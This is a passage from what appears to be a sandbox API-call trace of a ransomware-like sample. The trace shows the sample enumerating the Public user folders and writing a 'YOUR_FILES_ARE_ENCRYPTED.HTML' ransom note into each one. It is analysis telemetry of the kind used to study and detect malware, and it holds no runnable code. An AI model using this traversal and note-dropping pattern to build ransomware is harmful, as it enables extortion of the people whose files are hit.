ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b365a97, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b365a97, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Desktop", cAlternateFileName="")) returned 1 [0171.539] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop") returned 27 [0171.540] GetProcessHeap () returned 0x270000 [0171.540] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.540] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Desktop" | out: 
lpString1="\\\\?\\C:\\Users\\Public\\Desktop") returned="\\\\?\\C:\\Users\\Public\\Desktop" [0171.540] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\*") returned="\\\\?\\C:\\Users\\Public\\Desktop\\*" [0171.540] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b365a97, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b365a97, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.540] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b365a97, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b365a97, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.541] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b365a97, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b365a97, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b365a97, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.541] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") 
returned 39 [0171.541] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.541] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.541] lstrlenW (lpString=".ini") returned 4 [0171.541] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.541] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b365a97, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b365a97, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b365a97, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.541] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.541] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 57 [0171.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\desktop\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.542] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.544] CloseHandle (hObject=0x5a0) returned 1 [0171.544] GetProcessHeap () returned 0x270000 [0171.545] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.545] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, 
ftCreationTime.dwLowDateTime=0x6b61335c, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b61335c, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b61335c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.545] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\desktop.ini") returned 31 [0171.545] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.545] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.545] lstrlenW (lpString=".ini") returned 4 [0171.545] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.545] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x1771d97e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1771d97e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0171.545] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents") returned 29 [0171.545] GetProcessHeap () returned 0x270000 [0171.545] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.545] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Documents" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents") returned="\\\\?\\C:\\Users\\Public\\Documents" [0171.545] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\*") 
returned="\\\\?\\C:\\Users\\Public\\Documents\\*" [0171.545] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x1771d97e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1771d97e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.546] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x1771d97e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1771d97e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.546] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b5ed1fc, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b5ed1fc, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b5ed1fc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.546] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned 41 [0171.546] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.546] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.546] lstrlenW (lpString=".ini") returned 4 
[0171.546] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.546] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0171.546] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Music") returned 38 [0171.546] GetProcessHeap () returned 0x270000 [0171.546] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.548] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Music") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Music" [0171.548] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*" [0171.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x74fa010, ftCreationTime.dwLowDateTime=0x431df40, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdbb4, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="ꀐݏ")) returned 0xffffffff [0171.548] GetProcessHeap () returned 0x270000 [0171.549] HeapFree (in: hHeap=0x270000, dwFlags=0x0, 
lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.549] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0171.549] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures") returned 41 [0171.549] GetProcessHeap () returned 0x270000 [0171.549] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.549] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures" [0171.549] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*" [0171.549] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x74fa010, ftCreationTime.dwLowDateTime=0x431df40, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdbb4, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="ꀐݏ")) returned 0xffffffff [0171.549] GetProcessHeap () returned 0x270000 [0171.550] HeapFree (in: hHeap=0x270000, 
dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.550] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0171.550] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Videos") returned 39 [0171.550] GetProcessHeap () returned 0x270000 [0171.550] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.550] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Videos" [0171.550] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*" [0171.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x74fa010, ftCreationTime.dwLowDateTime=0x431df40, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdbb4, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="ꀐݏ")) returned 0xffffffff [0171.550] GetProcessHeap () returned 0x270000 [0171.551] HeapFree (in: hHeap=0x270000, dwFlags=0x0, 
lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.551] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0171.551] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.551] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0171.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\documents\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.555] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.557] CloseHandle (hObject=0x5a0) returned 1 [0171.557] GetProcessHeap () returned 0x270000 [0171.558] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.558] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b3fe018, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b3fe018, 
ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0171.558] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads") returned 29 [0171.558] GetProcessHeap () returned 0x270000 [0171.558] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.558] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads") returned="\\\\?\\C:\\Users\\Public\\Downloads" [0171.558] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Downloads", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\*") returned="\\\\?\\C:\\Users\\Public\\Downloads\\*" [0171.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b3fe018, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.559] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b3fe018, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.559] FindNextFileW (in: hFindFile=0x42f3140, 
lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b3fe018, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b3fe018, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.559] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned 41 [0171.559] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.559] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.559] lstrlenW (lpString=".ini") returned 4 [0171.559] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.559] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b3fe018, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b3fe018, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.559] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.559] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0171.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\downloads\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.560] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.562] CloseHandle (hObject=0x5a0) returned 1 [0171.562] GetProcessHeap () returned 0x270000 [0171.562] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.562] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa16b2e6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69c7bfb6, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0171.562] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites") returned 29 [0171.562] GetProcessHeap () returned 0x270000 [0171.562] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.562] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\Public\\Favorites") returned="\\\\?\\C:\\Users\\Public\\Favorites" [0171.563] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Favorites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Favorites\\*") returned="\\\\?\\C:\\Users\\Public\\Favorites\\*" [0171.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, 
ftLastAccessTime.dwLowDateTime=0xfa16b2e6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69c7bfb6, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.563] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa16b2e6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69c7bfb6, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.563] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa16b2e6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa16b2e6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69c7bfb6, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.563] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.563] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0171.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\favorites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.564] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, 
